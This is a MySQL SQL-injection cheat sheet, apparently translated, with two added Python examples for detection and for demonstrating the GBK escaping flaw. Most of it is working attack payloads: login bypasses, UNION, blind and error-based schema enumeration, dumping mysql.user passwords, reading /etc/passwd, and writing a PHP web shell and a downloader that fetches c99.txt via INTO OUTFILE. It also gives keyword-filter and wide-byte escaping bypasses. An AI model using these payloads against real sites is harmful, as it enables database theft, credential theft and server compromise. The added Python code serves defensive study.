Databases that exist by default:
mysql | requires root privileges to read
information_schema | exists in MySQL 5 and later
Testing for the presence of an injection point
False: the query is broken (a MySQL error, or the returned page differs from the original)
True: the query is normal (the returned page is the same as the original)
Three cases in total:
String-type query:
'  | false
'' | true
"  | false
"" | true
\  | false
\\ | true
Numeric-type query:
and 1     | true
and 0     | false
and true  | true
and false | false
1-false   | returns record 1 if there is an injection
1-true    | returns record 0 if there is an injection
2-1       | returns the same page as 1: possibly injectable
1*56      | returns the same page as 56: possibly injectable
1*56      | returns the same page as 1: not injectable
Login form:
' OR ' 1
' OR 1-- -
"OR" "="
"OR 1=1-- -
=
' LIKE '
' =0--+
|
Example:
SELECT * FROM Users WHERE id = '1'; SELECT * FROM Users WHERE id = 3-2; SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';
Any number of single and double quotes can be used, as long as they appear in pairs.
SELECT * FROM articles WHERE id = '121' "" ""
The statement continues to execute after the quotation marks.
SELECT '1' "" "" UNION SELECT '2' # returns 1 and 2
The following symbols can be used to comment out the rest of a statement:
#    | hash comment
/*   | C-style comment
-- - | SQL comment
;%00 | null byte
`    | backtick
Example:
SELECT * FROM Users WHERE username = '' OR 1=1-- -' AND password = ''; SELECT * FROM Users WHERE id = ' UNION SELECT 1, 2, 3 ';
Testing the database version
VERSION(), @@VERSION, @@GLOBAL.VERSION
If the version is 5, the following example returns true:
SELECT * FROM Users WHERE id = '1' AND MID(VERSION(), 1, 1) = '5';
The version string returned on Windows differs from the one on Linux: a Windows server returns a string containing -nt (for example -nt-log).
Database authentication information:
Table | mysql.user
Fields | user, password
Current user | USER(), CURRENT_USER(), CURRENT_USER, SYSTEM_USER(), SESSION_USER()
Example:
SELECT CURRENT_USER; SELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root' -- (requires privileges)
Database name:
Table | information_schema.schemata, mysql.db
Fields | schema_name, db
Current database | DATABASE(), SCHEMA()
Example:
SELECT DATABASE(); SELECT schema_name FROM information_schema.schemata; SELECT DISTINCT(db) FROM mysql.db; -- (requires privileges)
Server host name:
@@HOSTNAME
Example:
SELECT @@hostname;
Detecting the number of fields in a table or query
Two different ways:
ORDER BY | ORDER BY N+1; keep increasing N until the error page appears. Example: for the query SELECT username, password, permission FROM Users WHERE id = '1';
  1' ORDER BY 1--+  true
  1' ORDER BY 2--+  true
  1' ORDER BY 3--+  true
  1' ORDER BY 4--+  false, so the query uses only 3 fields
  -1' UNION SELECT 1,2,3--+  true
Error-based | and (SELECT * FROM some_existing_table) = 1. Note: this method requires you to know the name of the table you want to query, and the error reveals the number of fields in that table, not in the injected query. Example: for the query SELECT permission FROM Users WHERE id = 1; and (SELECT * FROM Users) = 1 returns the number of fields in Users
Querying table names
Three different ways:
Union | UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; -- MySQL 4 uses version=9, MySQL 5 uses version=10
Blind | and (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables) > 'A'
Error-based | and (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2)))
  (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1), !@) HAVING @||MIN(@:=0);
  and EXTRACTVALUE(1, CONCAT(0x5C, (SELECT table_name FROM information_schema.tables LIMIT 1))); -- works from version 5.1.5
Querying column names
Union | UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Blind | and (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns) > 'A'
Error-based | and (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1), FLOOR(RAND(0)*2)))
  (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1), !@) HAVING @||MIN(@:=0);
  and EXTRACTVALUE(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1))); -- works from version 5.1.5
  and (+/-) = (SELECT * FROM some_existing_table UNION SELECT LIMIT 1) -- fixed in MySQL 5.1
PROCEDURE ANALYSE() | This requires that the page displays a field of the query you have injected into. Example: for the query SELECT username, permission FROM Users WHERE id = 1;
  1 PROCEDURE ANALYSE()  returns the first field name
  1 LIMIT 1,1 PROCEDURE ANALYSE()  returns the second field name
  1 LIMIT 2,1 PROCEDURE ANALYSE()  returns the third field name
Querying multiple tables and columns at once
SELECT (@) FROM (SELECT (@:=0x00), (SELECT (@) FROM (information_schema.columns) WHERE (table_schema>@) AND (@) IN (@:=CONCAT(@, 0x0a, '[', table_schema, '] > ', table_name, ' > ', column_name)))) x
Example:
SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT (@:=0x00), (SELECT (@) FROM (information_schema.columns) WHERE (table_schema>@) AND (@) IN (@:=CONCAT(@, 0x0a, '[', table_schema, '] > ', table_name, ' > ', column_name)))) x), 4--+';
Output:
[information_schema] > character_sets > CHARACTER_SET_NAME
[information_schema] > character_sets > DEFAULT_COLLATE_NAME
[information_schema] > character_sets > DESCRIPTION
[information_schema] > character_sets > MAXLEN
[information_schema] > collations > COLLATION_NAME
[information_schema] > collations > CHARACTER_SET_NAME
[information_schema] > collations > ID
[information_schema] > collations > IS_DEFAULT
[information_schema] > collations > IS_COMPILED
Alternative query:
SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e), 1, 1024) FROM information_schema.columns
Example:
SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e), 1, 1024) FROM information_schema.columns;
Output (0x3c62723e is "<br>", 0x5461626c653a20 is "Table: ", 0x436f6c756d6e3a20 is "Column: "):
Table: talk_revisions Column: revid
Table: talk_revisions Column: userid
Table: talk_revisions Column: user
Table: talk_projects Column: priority
Finding tables by column name
SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; | tables that have a field named username
SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; | tables that have a field containing "user"
Finding the fields a table contains
SELECT column_name FROM information_schema.columns WHERE table_name = 'Users'; | fields of the Users table
SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%'; | fields of tables whose name contains "user"
Bypassing quote restrictions
SELECT * FROM Users WHERE username = 0x61646d696e | hex encoding
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) | using the CHAR() function
Bypassing a string blacklist
SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
With CONCAT(), if any argument is NULL the result is NULL, so CONCAT_WS() is recommended instead.
The first argument of CONCAT_WS() is the separator placed between the remaining arguments in the result.
Conditional statements
CASE
IF()
IFNULL()
NULLIF()
Example:
SELECT IF(1=1, true, false); SELECT CASE WHEN 1=1 THEN true ELSE false END;
Time-delay queries:
SLEEP()     | MySQL 5
BENCHMARK() | MySQL 4/5
Example:
'-(IF(MID(VERSION(),1,1) LIKE 5, BENCHMARK(100000, SHA1('true')), false))-'
File permissions
The following statements query whether the user has file read/write privileges:
SELECT file_priv FROM mysql.user WHERE user = 'username'; | must be run as root | MySQL 4/5
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee LIKE '%username%'; | ordinary users can run it | MySQL 5
Reading files
If the user has the FILE privilege, files can be read with:
LOAD_FILE()
Example:
SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE(0x2f6574632f706173737764);
- The file must be on the database server.
- Relative paths given to LOAD_FILE() are resolved against @@datadir.
- The MySQL user must have permission to read the file.
- The file size must be less than max_allowed_packet.
- The default value of @@max_allowed_packet is 1047552 bytes.
Writing files
If the user has the FILE privilege, files can be written with:
INTO OUTFILE / INTO DUMPFILE
Writing a PHP shell:
SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
Then visit the following link:
http://localhost/shell.php?c=cat%20/etc/passwd
Writing a downloader:
SELECT '<? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'
Then visit the following link:
http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt
- INTO OUTFILE cannot overwrite files that already exist.
- INTO OUTFILE must be the last part of the query.
- Quotation marks are required here because there is no way to encode the path name.
Stacked queries through PDO
PHP connecting with pdo_mysql can use stacked queries, which execute multiple statements in a single call.
SELECT * FROM Users WHERE id=1 AND 1=0; INSERT INTO Users (username, password, priv) VALUES ('bobbytables', 'kl20da$$', 'admin');
MySQL-specific comment syntax
In MySQL, SQL written inside /*! ... */ is parsed as a normal statement.
If the opening marker is followed by a number (a MySQL version number), as in /*!12345 SQL statement */, the statement is executed only when the server version is greater than or equal to that number; otherwise it is skipped.
SELECT 1/*!41320union/*!/*!/*!00000select/*!/*! user/*! (/*!/*!/*!*/);
Whitespace characters that can be used for obfuscation
09 | horizontal tab
0A | new line
0B | vertical tab
0C | form feed
0D | carriage return
A0 | non-breaking space
20 | space
Example:
'%0a%09union%0cselect%a0null%20%23
Parentheses can also be used to bypass whitespace filtering:
Example:
UNION (SELECT (column) FROM (table))
Characters that can directly follow AND or OR
20 | space
2B | +
2D | -
7E | ~
21 | !
40 | @
Example:
SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
DUAL is a dummy table that can be used for testing.
Several examples of bypassing a keyword blacklist

Filtered keywords: and, or
PHP code: preg_match('/(and|or)/i', $id)
Filtered attack code:
  1 or 1=1
  1 and 1=1
Bypass:
  1 || 1=1
  1 && 1=1

The following cases assume some table and field names are already known (they can be obtained with the SUBSTRING function against information_schema.columns).

Filtered keywords: and, or, union
PHP code: preg_match('/(and|or|union)/i', $id)
Filtered attack code: union select user,password from users
Bypass: 1 && (select user from users where userid=1) = 'admin'

Filtered keywords: and, or, union, where
PHP code: preg_match('/(and|or|union|where)/i', $id)
Filtered attack code: 1 && (select user from users where user_id = 1) = 'admin'
Bypass: 1 && (select user from users limit 1) = 'admin'

Filtered keywords: and, or, union, where, limit
PHP code: preg_match('/(and|or|union|where|limit)/i', $id)
Filtered attack code: 1 && (select user from users limit 1) = 'admin'
Bypass: 1 && (select user from users group by user_id having user_id = 1) = 'admin'  # in the user_id grouping, the user whose user_id is 1 is admin

Filtered keywords: and, or, union, where, limit, group by
PHP code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered attack code: 1 && (select user from users group by user_id having user_id = 1) = 'admin'
Bypass: 1 && (select substr(group_concat(user_id),1) user from users) =

Filtered keywords: and, or, union, where, limit, group by, select
PHP code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered attack code: 1 && (select substr(group_concat(user_id),1) user from users) =
Bypass: 1 && substr(user,1,1) = 'a'

Filtered keywords: and, or, union, where, limit, group by, select, '
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered attack code: 1 && (select substr(group_concat(user_id),1) user from users) =
Bypass:
  1 && user_id is not null
  1 && substr(user,1,1) = 0x61
  1 && substr(user,1,1) = unhex(61)

Filtered keywords: and, or, union, where, limit, group by, select, ', hex
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered attack code: 1 && substr(user,1,1) = unhex(61)
Bypass: 1 && substr(user,1,1) = lower(conv(11,10,16))  # decimal 11 converted to hexadecimal, in lowercase

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered attack code: 1 && substr(user,1,1) = lower(conv(11,10,16))
Bypass: 1 && lpad(user,7,1)

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, whitespace
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered attack code: 1 && lpad(user,7,1)
Bypass: 1%0b||%0blpad(user,7,1)

Filtered keywords: and, or, union, where
PHP code: preg_match('/(and|or|union|where)/i', $id)
Filtered attack code: 1 || (select user from users where user_id = 1) = 'admin'
Bypass: 1 || (select user from users limit 1) = 'admin'
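A normalisation pass a detector can run before keyword matching, added here as an example (not code from the original page): it folds the whitespace bytes, comment forms and || / && spellings listed above and in the blacklist cases into the token stream MySQL actually lexes, which is why the preg_match() blacklists shown above miss them. Function names are hypothetical; the inputs in the comments are the page's own payloads.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes MySQL's lexer accepts as token separators (the page's list:
# 09 0A 0B 0C 0D A0 20).  A filter that only knows 0x20 misses the rest.
MYSQL_SPACE = b"\x09\x0a\x0b\x0c\x0d\xa0\x20"
_SPACE_MAP = bytes.maketrans(MYSQL_SPACE, b" " * len(MYSQL_SPACE))

# Keywords the page's preg_match() blacklists try to catch.
KEYWORDS = re.compile(
    r"\b(and|or|union|where|limit|group\s+by|select|hex|substr)\b")


def normalize(param: str) -> str:
    """Rewrite a form-encoded parameter into the tokens MySQL will lex:
    decode percent escapes, strip comments, fold whitespace variants and
    spell out the || / && operators.  E.g. "'%0a%09union%0cselect%a0null%20%23"
    becomes "' union select null"."""
    data = unquote_to_bytes(param.replace("+", " "))   # form encoding
    # /*!12345 ... */ is executed by MySQL, so keep its body and drop only
    # the marker; ordinary /* ... */ comments are dead text.
    data = re.sub(rb"/\*!\d{0,5}", b" ", data)
    data = re.sub(rb"/\*(?!!).*?\*/", b" ", data, flags=re.S)
    data = data.replace(b"*/", b" ")                   # stray closers
    data = re.sub(rb"#.*", b"", data)                  # '#' to end of line
    data = re.sub(rb"--[\x09\x0a\x0b\x0c\x0d\xa0\x20].*", b"", data)  # '-- '
    data = data.translate(_SPACE_MAP)
    data = data.replace(b"||", b" or ").replace(b"&&", b" and ")
    data = re.sub(rb" +", b" ", data).strip()
    return data.decode("latin-1").lower()


def keywords(normalized: str) -> list:
    """Blacklisted keywords visible after normalisation, sorted.
    For "1%0b||%0blpad(user,7,1)" the result is ["or"]."""
    return sorted(set(KEYWORDS.findall(normalized)))
```

Matching keywords after normalisation closes the gaps listed on this page but is still a blacklist; parameterised queries remove the bug class rather than one spelling of it.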
Blind injection with regular expressions
In MySQL 5 and later, all database, table and field names are stored in the information_schema database. The approach is as follows:
1. Determine whether the first character of the first table name is in a-z; here Blind_sqli is the database name assumed to be known.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*
2. Determine whether the first character is in a-n.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. Determine that the character is n.
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="Blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*
4. Keep replacing the expression in the same way.
Once the table name is found to be news, it can be verified with the regular expression '^news$', though it is simpler to test table_name = 'news' directly.
5. To guess the next table, only the LIMIT clause needs to change (for example LIMIT 2,1), which makes the next table the target of the blind test.
Injection after ORDER BY
Because ORDER BY sorts the result, a conditional expression can be placed there and its truth inferred from how the returned order changes.
When a field name is known, a parameter that lands in an ORDER BY clause can be injected like this:
Original link: http://www.test.com/list.php?order=vote sorts by the vote field.
Find the largest vote count, num, then construct the following link:
http://www.test.com/list.php?order=abs(vote-(user()>0)*num)+asc
and see whether the sort order changes.
There is also a method that needs no field information at all, using the RAND() function:
http://www.test.com/list.php?order=rand(true)
http://www.test.com/list.php?order=rand(false)
These two return different orderings, so the following tests whether the first character of the first table name is below 128:
http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)
Wide-byte injection
The most common use of GBK encoding in SQL injection is bypassing escaping functions such as addslashes(). The hex value of the backslash is %5c. When %bf%27 is entered, the function escapes the single quote by prepending a backslash, producing %bf%5c%27; in GBK, %bf%5c is the wide character "縗", so the backslash is absorbed into that character and the quote survives unescaped. The %bf byte can be any lead byte in the range %81-%fe. Wide-byte issues apply in many places, not only SQL injection.
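The mechanism above, worked through as an added example (not code from the original page): a byte-oriented escape in the style of addslashes() is applied before a GBK connection decodes the bytes, and the result is compared with escaping after decoding. Function names and the SQL template are hypothetical.

```python
# Added example: why byte-wise escaping fails on a GBK connection, and a
# charset-aware alternative.  TEMPLATE is a constructed query prefix.
TEMPLATE = "SELECT * FROM users WHERE name = '"


def addslashes(data: bytes) -> bytes:
    """Escape the way PHP's addslashes() does: prefix ' " \\ and NUL with
    0x5C, byte by byte, with no knowledge of the connection character set."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def literal_end(sql: str) -> int:
    """Index of the quote closing the first single-quoted literal in sql,
    honouring backslash escapes; -1 if the literal never closes."""
    i = sql.index("'") + 1
    while i < len(sql):
        if sql[i] == "\\":
            i += 2          # escaped character: skip it
            continue
        if sql[i] == "'":
            return i
        i += 1
    return -1


def closes_early(sql: str) -> bool:
    """True when the literal ends before the final quote, i.e. the
    submitted quote broke out of the string."""
    return literal_end(sql) != len(sql) - 1


def escape_then_decode(user_input: bytes) -> str:
    """Vulnerable order: escape raw bytes, then let a GBK connection decode.
    For %bf%27 the backslash (0x5C) becomes the trail byte of 0xBF 0x5C,
    which GBK reads as the single character 縗."""
    raw = TEMPLATE.encode() + addslashes(user_input) + b"'"
    return raw.decode("gbk", errors="replace")


def decode_then_escape(user_input: bytes) -> str:
    """Safer order: decode as the connection charset first, then escape in
    the string domain.  A lone 0xBF has no valid trail byte and is replaced,
    so it can never absorb the escaping backslash."""
    text = user_input.decode("gbk", errors="replace")
    text = text.replace("\\", "\\\\").replace("'", "\\'")
    return TEMPLATE + text + "'"
```

In PHP the same ordering problem is avoided by telling the driver the connection charset (mysqli::set_charset()) before escaping, or by using prepared statements so that no escaping is needed.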
MySQL injection primer